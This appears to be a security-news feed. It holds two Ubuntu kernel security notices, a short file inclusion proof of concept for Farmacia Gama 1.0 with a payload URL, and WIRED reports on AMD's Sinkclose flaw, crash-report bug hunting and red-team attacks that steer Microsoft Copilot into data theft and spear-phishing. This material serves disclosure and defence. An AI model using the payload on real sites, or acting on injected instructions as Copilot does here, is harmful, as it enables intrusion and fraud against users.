linux-image-gcp-lts-20.04       5.4.0.1134.136   linux-image-generic             5.4.0.192.190   linux-image-generic-lpae        5.4.0.192.190   linux-image-gkeop               5.4.0.1097.95   linux-image-gkeop-5.4           5.4.0.1097.95   linux-image-ibm-lts-20.04       5.4.0.1077.106   linux-image-kvm                 5.4.0.1118.114   linux-image-lowlatency          5.4.0.192.190   linux-image-oem                 5.4.0.192.190   linux-image-oem-osp1            5.4.0.192.190   linux-image-raspi               5.4.0.1114.144   linux-image-raspi2              5.4.0.1114.144   linux-image-virtual             5.4.0.192.190   linux-image-xilinx-zynqmp       5.4.0.1049.49Ubuntu 18.04 LTS   linux-image-5.4.0-1077-ibm      5.4.0-1077.82~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1130-aws      5.4.0-1130.140~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-1134-gcp      5.4.0-1134.143~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-192-generic   5.4.0-192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-5.4.0-192-lowlatency  5.4.0-192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-aws                 5.4.0.1130.140~18.04.1                                   Available with Ubuntu Pro   linux-image-gcp                 5.4.0.1134.143~18.04.1                                   Available with Ubuntu Pro   linux-image-generic-hwe-18.04   5.4.0.192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-ibm                 5.4.0.1077.82~18.04.1                                   Available with Ubuntu Pro   linux-image-lowlatency-hwe-18.04  5.4.0.192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-oem                 5.4.0.192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-oem-osp1            5.4.0.192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-snapdragon-hwe-18.04  5.4.0.192.212~18.04.1                                   Available with Ubuntu Pro   linux-image-virtual-hwe-18.04   5.4.0.192.212~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6951-1   CVE-2022-48674, CVE-2022-48772, CVE-2023-52434, CVE-2023-52585,   CVE-2023-52752, CVE-2023-52882, CVE-2024-26886, CVE-2024-27019,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27401, CVE-2024-31076,   CVE-2024-33621, CVE-2024-35947, CVE-2024-35976, CVE-2024-36014,   CVE-2024-36015, CVE-2024-36017, CVE-2024-36270, CVE-2024-36286,   CVE-2024-36883, CVE-2024-36886, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36919, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36946,   CVE-2024-36950, CVE-2024-36954, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36971, CVE-2024-37353, CVE-2024-37356,   CVE-2024-38381, CVE-2024-38549, CVE-2024-38552, CVE-2024-38558,   CVE-2024-38559, CVE-2024-38560, CVE-2024-38565, CVE-2024-38567,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38582, CVE-2024-38583,   CVE-2024-38587, CVE-2024-38589, CVE-2024-38596, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38607,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38615, CVE-2024-38618,   CVE-2024-38621, CVE-2024-38627, CVE-2024-38633, CVE-2024-38634,   CVE-2024-38635, CVE-2024-38637, CVE-2024-38659, CVE-2024-38661,   CVE-2024-38780, CVE-2024-39276, CVE-2024-39292, CVE-2024-39301,   CVE-2024-39467, CVE-2024-39471, CVE-2024-39475, CVE-2024-39480,   CVE-2024-39488, CVE-2024-39489, CVE-2024-39493Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-192.212   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1130.140   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1134.143   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1097.101   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1077.82   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1042.43   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1118.125   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1114.126   https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1049.53

Ubuntu Security Notice USN-6951-1

Ubuntu Security Notice 6949-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6949-1August 08, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-nvidia,linux-nvidia-6.8, linux-oem-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-nvidia: Linux kernel for NVIDIA systems- linux-oem-6.8: Linux kernel for OEM systems- linux-nvidia-6.8: Linux kernel for NVIDIA systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - M68K architecture;   - OpenRISC architecture;   - PowerPC architecture;   - RISC-V architecture;   - x86 architecture;   - Block layer subsystem;   - Accessibility subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - DMA engine subsystem;   - DPLL subsystem;   - FireWire subsystem;   - EFI core;   - Qualcomm firmware drivers;   - GPIO subsystem;   - GPU drivers;   - Microsoft Hyper-V drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - IRQ chip drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - EEPROM drivers;   - MMC subsystem;   - Network drivers;   - STMicroelectronics network drivers;   - Device tree and open firmware driver;   - HiSilicon SoC PMU drivers;   - PHY drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - Userspace I/O drivers;   - USB subsystem;   - DesignWare USB3 driver;   - ACRN Hypervisor Service Module driver;   - Virtio drivers;   - 9P distributed file system;   - BTRFS file system;   - eCrypt file system;   - EROFS file system;   - File systems infrastructure;   - GFS2 file system;   - JFFS2 file system;   - Network file systems library;   - Network file system client;   - Network file system server daemon;   - NILFS2 file system;   - Proc file system;   - SMB network file system;   - Tracing file system;   - Mellanox drivers;   - Memory management;   - Socket messages infrastructure;   - Slab allocator;   - Tracing infrastructure;   - User-space API (UAPI);   - Core kernel;   - BPF subsystem;   - DMA mapping infrastructure;   - RCU subsystem;   - Dynamic debug library;   - KUnit library;   - Maple Tree data structure library;   - Heterogeneous memory management;   - Amateur Radio drivers;   - Bluetooth subsystem;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - SMC sockets;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;   - Kirkwood ASoC drivers;   - MediaTek ASoC drivers;(CVE-2024-36006, CVE-2024-36922, CVE-2024-38567, CVE-2024-38584,CVE-2024-36923, CVE-2024-36892, CVE-2024-35855, CVE-2024-35853,CVE-2024-38562, CVE-2024-36920, CVE-2024-38543, CVE-2024-38576,CVE-2024-38572, CVE-2024-36898, CVE-2024-38560, CVE-2024-36004,CVE-2024-36956, CVE-2024-36881, CVE-2024-36977, CVE-2024-36955,CVE-2024-36906, CVE-2024-36013, CVE-2024-36884, CVE-2024-38563,CVE-2024-36966, CVE-2024-38547, CVE-2024-38594, CVE-2024-36926,CVE-2024-38587, CVE-2024-38566, CVE-2024-27400, CVE-2024-36941,CVE-2024-36017, CVE-2024-38544, CVE-2024-36899, CVE-2024-35851,CVE-2024-38577, CVE-2024-38590, CVE-2024-38568, CVE-2024-38559,CVE-2024-38611, CVE-2024-36887, CVE-2024-36886, CVE-2024-35996,CVE-2024-38612, CVE-2024-36925, CVE-2024-38586, CVE-2024-38596,CVE-2024-36932, CVE-2024-39482, CVE-2024-38585, CVE-2024-36033,CVE-2024-38614, CVE-2024-35852, CVE-2024-36908, CVE-2024-36939,CVE-2024-36963, CVE-2024-27401, CVE-2024-36029, CVE-2024-38540,CVE-2024-38565, CVE-2024-36927, CVE-2024-36910, CVE-2024-42134,CVE-2024-36888, CVE-2024-35859, CVE-2024-36911, CVE-2024-35947,CVE-2024-36940, CVE-2024-36921, CVE-2024-36913, CVE-2024-36943,CVE-2024-35986, CVE-2024-38616, CVE-2024-36900, CVE-2024-36954,CVE-2024-36915, CVE-2024-38602, CVE-2024-41011, CVE-2024-35991,CVE-2024-36909, CVE-2024-38603, CVE-2023-52882, CVE-2024-36953,CVE-2024-38599, CVE-2024-38574, CVE-2024-36967, CVE-2024-36895,CVE-2024-36003, CVE-2024-36961, CVE-2024-38545, CVE-2024-38538,CVE-2024-36001, CVE-2024-36912, CVE-2024-36952, CVE-2024-38550,CVE-2024-38570, CVE-2024-36969, CVE-2024-38595, CVE-2024-35849,CVE-2024-36936, CVE-2024-35949, CVE-2024-36009, CVE-2024-35987,CVE-2024-38541, CVE-2024-38564, CVE-2024-36032, CVE-2024-38615,CVE-2024-36960, CVE-2024-36934, CVE-2024-36951, CVE-2024-35999,CVE-2024-38551, CVE-2024-36903, CVE-2024-36931, CVE-2024-38593,CVE-2024-36938, CVE-2024-38607, CVE-2024-36928, CVE-2024-38552,CVE-2024-36002, CVE-2024-38605, CVE-2024-38582, CVE-2024-36933,CVE-2024-38620, CVE-2024-27395, CVE-2024-27396, CVE-2024-36012,CVE-2024-38591, CVE-2024-38597, CVE-2024-36889, CVE-2024-36964,CVE-2024-38606, CVE-2024-38553, CVE-2024-36945, CVE-2024-35848,CVE-2024-36962, CVE-2024-36947, CVE-2024-27399, CVE-2024-38546,CVE-2024-38583, CVE-2024-38573, CVE-2024-35850, CVE-2024-38549,CVE-2024-38588, CVE-2024-38610, CVE-2024-36917, CVE-2024-36957,CVE-2024-35846, CVE-2024-38579, CVE-2024-36965, CVE-2024-35857,CVE-2024-38548, CVE-2024-36975, CVE-2024-36919, CVE-2024-38542,CVE-2024-36948, CVE-2024-36011, CVE-2024-38556, CVE-2024-36897,CVE-2024-38557, CVE-2024-36890, CVE-2024-36882, CVE-2024-38613,CVE-2024-36914, CVE-2024-35998, CVE-2024-36958, CVE-2024-38580,CVE-2024-36896, CVE-2024-36891, CVE-2024-36924, CVE-2024-38589,CVE-2024-38592, CVE-2024-36904, CVE-2024-36894, CVE-2024-36028,CVE-2024-36014, CVE-2024-36880, CVE-2024-36944, CVE-2024-38598,CVE-2024-36929, CVE-2024-36883, CVE-2024-35858, CVE-2024-38555,CVE-2024-36005, CVE-2024-38539, CVE-2024-35994, CVE-2024-36030,CVE-2024-27394, CVE-2024-36930, CVE-2024-36937, CVE-2024-38561,CVE-2024-38578, CVE-2024-36959, CVE-2024-36935, CVE-2024-36916,CVE-2024-36902, CVE-2024-38604, CVE-2024-38554, CVE-2024-38575,CVE-2024-36918, CVE-2024-36979, CVE-2024-35854, CVE-2024-36968,CVE-2024-38558, CVE-2024-36000, CVE-2024-27398, CVE-2024-35983,CVE-2024-36949, CVE-2024-38600, CVE-2024-36950, CVE-2024-36946,CVE-2024-36031, CVE-2024-35847, CVE-2024-36905, CVE-2024-38571,CVE-2024-36007, CVE-2024-35856, CVE-2024-38601, CVE-2024-38569,CVE-2024-38617, CVE-2024-35988, CVE-2024-35989, CVE-2024-35993,CVE-2024-36893, CVE-2024-36901)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1008-gke      6.8.0-1008.11   linux-image-6.8.0-1010-ibm      6.8.0-1010.10   linux-image-6.8.0-1010-oem      6.8.0-1010.10   linux-image-6.8.0-1011-nvidia   6.8.0-1011.11   linux-image-6.8.0-1011-nvidia-64k  6.8.0-1011.11   linux-image-6.8.0-1012-gcp      6.8.0-1012.13   linux-image-6.8.0-1013-aws      6.8.0-1013.14   linux-image-6.8.0-40-generic    6.8.0-40.40   linux-image-6.8.0-40-generic-64k  6.8.0-40.40   linux-image-aws                 6.8.0-1013.14   linux-image-gcp                 6.8.0-1012.13   linux-image-generic             6.8.0-40.40   linux-image-generic-64k         6.8.0-40.40   linux-image-generic-64k-hwe-24.04  6.8.0-40.40   linux-image-generic-hwe-24.04   6.8.0-40.40   linux-image-generic-lpae        6.8.0-40.40   linux-image-gke                 6.8.0-1008.11   linux-image-ibm                 6.8.0-1010.10   linux-image-ibm-classic         6.8.0-1010.10   linux-image-ibm-lts-24.04       6.8.0-1010.10   linux-image-kvm                 6.8.0-40.40   linux-image-nvidia              6.8.0-1011.11   linux-image-nvidia-64k          6.8.0-1011.11   linux-image-oem-24.04           6.8.0-1010.10   linux-image-oem-24.04a          6.8.0-1010.10   linux-image-virtual             6.8.0-40.40   linux-image-virtual-hwe-24.04   6.8.0-40.40Ubuntu 22.04 LTS   linux-image-6.8.0-1011-nvidia   6.8.0-1011.11~22.04.1   linux-image-6.8.0-1011-nvidia-64k  6.8.0-1011.11~22.04.1   linux-image-nvidia-6.8          6.8.0-1011.11~22.04.1   linux-image-nvidia-64k-6.8      6.8.0-1011.11~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6949-1   CVE-2023-52882, CVE-2024-27394, CVE-2024-27395, CVE-2024-27396,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27400, CVE-2024-27401,   CVE-2024-35846, CVE-2024-35847, CVE-2024-35848, CVE-2024-35849,   CVE-2024-35850, CVE-2024-35851, CVE-2024-35852, CVE-2024-35853,   CVE-2024-35854, CVE-2024-35855, CVE-2024-35856, CVE-2024-35857,   CVE-2024-35858, CVE-2024-35859, CVE-2024-35947, CVE-2024-35949,   CVE-2024-35983, CVE-2024-35986, CVE-2024-35987, CVE-2024-35988,   CVE-2024-35989, CVE-2024-35991, CVE-2024-35993, CVE-2024-35994,   CVE-2024-35996, CVE-2024-35998, CVE-2024-35999, CVE-2024-36000,   CVE-2024-36001, CVE-2024-36002, CVE-2024-36003, CVE-2024-36004,   CVE-2024-36005, CVE-2024-36006, CVE-2024-36007, CVE-2024-36009,   CVE-2024-36011, CVE-2024-36012, CVE-2024-36013, CVE-2024-36014,   CVE-2024-36017, CVE-2024-36028, CVE-2024-36029, CVE-2024-36030,   CVE-2024-36031, CVE-2024-36032, CVE-2024-36033, CVE-2024-36880,   CVE-2024-36881, CVE-2024-36882, CVE-2024-36883, CVE-2024-36884,   CVE-2024-36886, CVE-2024-36887, CVE-2024-36888, CVE-2024-36889,   CVE-2024-36890, CVE-2024-36891, CVE-2024-36892, CVE-2024-36893,   CVE-2024-36894, CVE-2024-36895, CVE-2024-36896, CVE-2024-36897,   CVE-2024-36898, CVE-2024-36899, CVE-2024-36900, CVE-2024-36901,   CVE-2024-36902, CVE-2024-36903, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36908, CVE-2024-36909, CVE-2024-36910,   CVE-2024-36911, CVE-2024-36912, CVE-2024-36913, CVE-2024-36914,   CVE-2024-36915, CVE-2024-36916, CVE-2024-36917, CVE-2024-36918,   CVE-2024-36919, CVE-2024-36920, CVE-2024-36921, CVE-2024-36922,   CVE-2024-36923, CVE-2024-36924, CVE-2024-36925, CVE-2024-36926,   CVE-2024-36927, CVE-2024-36928, CVE-2024-36929, CVE-2024-36930,   CVE-2024-36931, CVE-2024-36932, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36935, CVE-2024-36936, CVE-2024-36937, CVE-2024-36938,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36943,   CVE-2024-36944, CVE-2024-36945, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36948, CVE-2024-36949, CVE-2024-36950, CVE-2024-36951,   CVE-2024-36952, CVE-2024-36953, CVE-2024-36954, CVE-2024-36955,   CVE-2024-36956, CVE-2024-36957, CVE-2024-36958, CVE-2024-36959,   CVE-2024-36960, CVE-2024-36961, CVE-2024-36962, CVE-2024-36963,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36966, CVE-2024-36967,   CVE-2024-36968, CVE-2024-36969, CVE-2024-36975, CVE-2024-36977,   CVE-2024-36979, CVE-2024-38538, CVE-2024-38539, CVE-2024-38540,   CVE-2024-38541, CVE-2024-38542, CVE-2024-38543, CVE-2024-38544,   CVE-2024-38545, CVE-2024-38546, CVE-2024-38547, CVE-2024-38548,   CVE-2024-38549, CVE-2024-38550, CVE-2024-38551, CVE-2024-38552,   CVE-2024-38553, CVE-2024-38554, CVE-2024-38555, CVE-2024-38556,   CVE-2024-38557, CVE-2024-38558, CVE-2024-38559, CVE-2024-38560,   CVE-2024-38561, CVE-2024-38562, CVE-2024-38563, CVE-2024-38564,   CVE-2024-38565, CVE-2024-38566, CVE-2024-38567, CVE-2024-38568,   CVE-2024-38569, CVE-2024-38570, CVE-2024-38571, CVE-2024-38572,   CVE-2024-38573, CVE-2024-38574, CVE-2024-38575, CVE-2024-38576,   CVE-2024-38577, CVE-2024-38578, CVE-2024-38579, CVE-2024-38580,   CVE-2024-38582, CVE-2024-38583, CVE-2024-38584, CVE-2024-38585,   CVE-2024-38586, CVE-2024-38587, CVE-2024-38588, CVE-2024-38589,   CVE-2024-38590, CVE-2024-38591, CVE-2024-38592, CVE-2024-38593,   CVE-2024-38594, CVE-2024-38595, CVE-2024-38596, CVE-2024-38597,   CVE-2024-38598, CVE-2024-38599, CVE-2024-38600, CVE-2024-38601,   CVE-2024-38602, CVE-2024-38603, CVE-2024-38604, CVE-2024-38605,   CVE-2024-38606, CVE-2024-38607, CVE-2024-38610, CVE-2024-38611,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38614, CVE-2024-38615,   CVE-2024-38616, CVE-2024-38617, CVE-2024-38620, CVE-2024-39482,   CVE-2024-41011, CVE-2024-42134Package Information:   https://launchpad.net/ubuntu/+source/linux/6.8.0-40.40   https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1013.14   https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1012.13   https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1008.11   https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1010.10   https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1011.11   https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1010.10   https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1011.11~22.04.1

Ubuntu Security Notice USN-6949-1

Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

Researchers warn that a bug in AMD’s chips would allow attackers to root into some of the most privileged portions of a computer—and that it has persisted in the company’s processors for decades.

Security flaws in your computer's firmware, the deep-seated code that loads first when you turn the machine on and controls even how its operating system boots up, have long been a target for hackers looking for a stealthy foothold. But only rarely does that kind of vulnerability appear not in the firmware of any particular computer maker, but in the chips found across hundreds of millions of PCs and servers. Now security researchers have found one such flaw that has persisted in AMD processors for decades, and that would allow malware to burrow deep enough into a computer's memory that, in many cases, it may be easier to discard a machine than to disinfect it.

At the Defcon hacker conference tomorrow, Enrique Nissim and Krzysztof Okupski, researchers from the security firm IOActive, plan to present a vulnerability in AMD chips they're calling Sinkclose. The flaw would allow hackers to run their own code in one of the most privileged modes of an AMD processor, known as System Management Mode, designed to be reserved only for a specific, protected portion of its firmware. IOActive's researchers warn that it affects virtually all AMD chips dating back to 2006, or possibly even earlier.

Nissim and Okupski note that exploiting the bug would require hackers to already have obtained relatively deep access to an AMD-based PC or server, but that the Sinkclose flaw would then allow them to plant their malicious code far deeper still. In fact, for any machine with one of the vulnerable AMD chips, the IOActive researchers warn that an attacker could infect the computer with malware known as a “bootkit” that evades antivirus tools and is potentially invisible to the operating system, while offering a hacker full access to tamper with the machine and surveil its activity. For systems with certain faulty configurations in how a computer maker implemented AMD's security feature known as Platform Secure Boot—which the researchers warn encompasses the large majority of the systems they tested—a malware infection installed via Sinkclose could be harder yet to detect or remediate, they say, surviving even a reinstallation of the operating system.

“Imagine nation-state hackers or whoever wants to persist on your system. Even if you wipe your drive clean, it's still going to be there,” says Okupski. “It's going to be nearly undetectable and nearly unpatchable.” Only opening a computer's case, physically connecting directly to a certain portion of its memory chips with a hardware-based programming tool known as SPI Flash programmer and meticulously scouring the memory would allow the malware to be removed, Okupski says.

Nissim sums up that worst-case scenario in more practical terms: “You basically have to throw your computer away.”

In a statement shared with WIRED, AMD acknowledged IOActive's findings, thanked the researchers for their work, and noted that it has “released mitigation options for its AMD EPYC datacenter products and AMD Ryzen PC products, with mitigations for AMD embedded products coming soon.” (The term “embedded,” in this case, refers to AMD chips found in systems such as industrial devices and cars.) For its EPYC processors designed for use in data-center servers, specifically, the company noted that it released patches earlier this year. AMD declined to answer questions in advance about how it intends to fix the Sinkclose vulnerability, or for exactly which devices and when, but it pointed to a full list of affected products that can be found on its website's security bulletin page.

In a background statement to WIRED, AMD emphasized the difficulty of exploiting Sinkclose: To take advantage of the vulnerability, a hacker has to already possess access to a computer's kernel, the core of its operating system. AMD compares the Sinkhole technique to a method for accessing a bank's safe-deposit boxes after already bypassing its alarms, the guards, and vault door.

Nissim and Okupski respond that while exploiting Sinkclose requires kernel-level access to a machine, such vulnerabilities are exposed in Windows and Linux practically every month. They argue that sophisticated state-sponsored hackers of the kind who might take advantage of Sinkclose likely already possess techniques for exploiting those vulnerabilities, known or unknown. “People have kernel exploits right now for all these systems,” says Nissim. “They exist and they're available for attackers. This is the next step.”

IOActive researchers Krzysztof Okupski (left) and Enrique Nissim.Photograph: Roger Kisby

Nissim and Okupski's Sinkclose technique works by exploiting an obscure feature of AMD chips known as TClose. (The Sinkclose name, in fact, comes from combining that TClose term with Sinkhole, the name of an earlier System Management Mode exploit found in Intel chips in 2015.) In AMD-based machines, a safeguard known as TSeg prevents the computer's operating systems from writing to a protected part of memory meant to be reserved for System Management Mode known as System Management Random Access Memory or SMRAM. AMD's TClose feature, however, is designed to allow computers to remain compatible with older devices that use the same memory addresses as SMRAM, remapping other memory to those SMRAM addresses when it's enabled. Nissim and Okupski found that, with only the operating system's level of privileges, they could use that TClose remapping feature to trick the SMM code into fetching data they've tampered with, in a way that allows them to redirect the processor and cause it to execute their own code at the same highly privileged SMM level.

“I think it's the most complex bug I've ever exploited,” says Okupski.

Nissim and Okupski, both of whom specialize in the security of low-level code like processor firmware, say they first decided to investigate AMD's architecture two years ago, simply because they felt it hadn't gotten enough scrutiny compared to Intel, even as its market share rose. They found the critical TClose edge case that enabled Sinkclose, they say, just by reading and rereading AMD's documentation. “I think I read the page where the vulnerability was about a thousand times,” says Nissim. “And then on one thousand and one, I noticed it.” They alerted AMD to the flaw in October of last year, they say, but have waited nearly 10 months to give AMD more time to prepare a fix.

For users seeking to protect themselves, Nissim and Okupski say that for Windows machines—likely the vast majority of affected systems—they expect patches for Sinkclose to be integrated into updates shared by computer makers with Microsoft, who will roll them into future operating system updates. Patches for servers, embedded systems, and Linux machines may be more piecemeal and manual; for Linux machines, it will depend in part on the distribution of Linux a computer has installed.

Nissim and Okupski say they agreed with AMD not to publish any proof-of-concept code for their Sinkclose exploit for several months to come, in order to provide more time for the problem to be fixed. But they argue that, despite any attempt by AMD or others to downplay Sinkclose as too difficult to exploit, it shouldn't prevent users from patching as soon as possible. Sophisticated hackers may already have discovered their technique—or may figure out how to after Nissim and Okupski present their findings at Defcon.

Even if Sinkclose requires relatively deep access, the IOActive researchers warn, the far deeper level of control it offers means that potential targets shouldn't wait to implement any fix available. “If the foundation is broken,” says Nissim, "then the security for the whole system is broken."

‘Sinkclose’ Flaw in Hundreds of Millions of AMD Chips Allows Deep, Virtually Unfixable Infections

One hacker solved the CrowdStrike outage mystery with simple crash reports, illustrating the wealth of detail about potential bugs and vulnerabilities those key documents hold.

When a bad software update from the security firm CrowdStrike inadvertently caused digital chaos around the world last month, the first signs were Windows computers showing the Blue Screen of Death. As websites and services went down and people scrambled to understand what was happening, conflicting and inaccurate information was everywhere. Rushing to understand the crisis, longtime Mac security researcher Patrick Wardle knew that there was one place he could look to get the facts: crash reports from computers impacted by the bug.

“Even though I am not a Windows researcher, I was intrigued by what was going on, and there was this dearth of information,” Wardle tells WIRED. “People were saying that it was a Microsoft problem, because Windows systems were blue-screening, and there were a lot of wild theories. But actually it had nothing to do with Microsoft. So I went to the crash reports, which to me hold the ultimate truth. And if you were looking there you were able to pinpoint the underlying cause long before CrowdStrike came out and said it.”

At the Black Hat security conference in Las Vegas on Thursday, Wardle made the case that crash reports are an underutilized tool. Such system snapshots give software developers and maintainers insight into possible problems with their code. And Wardle emphasizes that they can particularly be a fount of information about potentially exploitable vulnerabilities in software—for both defenders and attackers.

In his talk, Wardle presented multiple examples of vulnerabilities he has found in software when the app crashed and he combed through the report looking for the possible cause. Users can readily view their own crash reports on Windows, macOS, and Linux, and they're also available on Android and iOS, though they can be more challenging to access on mobile operating systems. Wardle notes that to glean insights from crash reports, you need a basic understanding of instructions written in the low-level machine code known as Assembly, but he emphasizes that the payoff is worth it.

In his Black Hat talk, Wardle presented multiple vulnerabilities he discovered simply by examining crash reports on his own devices—including bugs in the analysis tool YARA and in the current version of Apple's macOS operating system. In fact, when Wardle discovered in 2018 that an iOS bug caused apps to crash anytime they displayed the Taiwanese flag emoji, he got to the bottom of what was happening using, you guessed it, crash reports.

“We revealed conclusively that Apple had acquiesced to demands from China to censor the Taiwanese flag, but their censorship code had a bug in it—ridiculous,” he says. “My friend who originally observed this was like, ‘My phone is being hacked by the Chinese. Whenever you text me it crashes. Or are you hacking me?' And I said, ‘Rude, I wouldn’t hack you. And also, rude, if I did hack you, I wouldn’t crash your phone.’ So I pulled the crash reports to see what was going on.”

Wardle emphasizes that if he can find so many vulnerabilities just by looking at crash reports from his own devices and those of his friends, software developers need to be looking there, too. Sophisticated criminal actors and well-funded state-backed hackers alike are probably already getting ideas from their own crash reports. Over the years, news reports have indicated that intelligence agencies like the US National Security Agency do mine crash logs. Wardle points out that crash reports are also a valuable source of information for detecting malware, since they can reveal anomalous and potentially suspicious activity. The notorious spyware broker NSO Group, for example, would often build mechanisms into into their malware specifically to delete crash reports immediately upon infecting a device. And the fact that malware is often buggy makes crashes more likely and crash reports valuable to attackers as well for understanding what went wrong with their code.

“With crash reports, the truth is out there,” Wardle says. “Or, I guess, in there.”

Computer Crash Reports Are an Untapped Hacker Gold Mine

Attacks on Microsoft’s Copilot AI allow for answers to be manipulated, data extracted, and security protections bypassed, new research shows.

Microsoft raced to put generative AI at the heart of its systems. Ask a question about an upcoming meeting and the company’s Copilot AI system can pull answers from your emails, Teams chats, and files—a potential productivity boon. But these exact processes can also be abused by hackers.

Today at the Black Hat security conference in Las Vegas, researcher Michael Bargury is demonstrating five proof-of-concept ways that Copilot, which runs on its Microsoft 365 apps, such as Word, can be manipulated by malicious attackers, including using it to provide false references to files, exfiltrate some private data, and dodge Microsoft’s security protections.

One of the most alarming displays, arguably, is Bargury’s ability to turn the AI into an automatic spear-phishing machine. Dubbed LOLCopilot, the red-teaming code Bargury created can—crucially, once a hacker has access to someone’s work email—use Copilot to see who you email regularly, draft a message mimicking your writing style (including emoji use), and send a personalized blast that can include a malicious link or attached malware.

“I can do this with everyone you have ever spoken to, and I can send hundreds of emails on your behalf,” says Bargury, the cofounder and CTO of security company Zenity, who published his findings alongside videos showing how Copilot could be abused. “A hacker would spend days crafting the right email to get you to click on it, but they can generate hundreds of these emails in a few minutes.”

That demonstration, as with other attacks created by Bargury, broadly works by using the large language model (LLM) as designed: typing written questions to access data the AI can retrieve. However, it can produce malicious results by including additional data or instructions to perform certain actions. The research highlights some of the challenges of connecting AI systems to corporate data and what can happen when “untrusted” outside data is thrown into the mix—particularly when the AI answers with what could look like legitimate results.

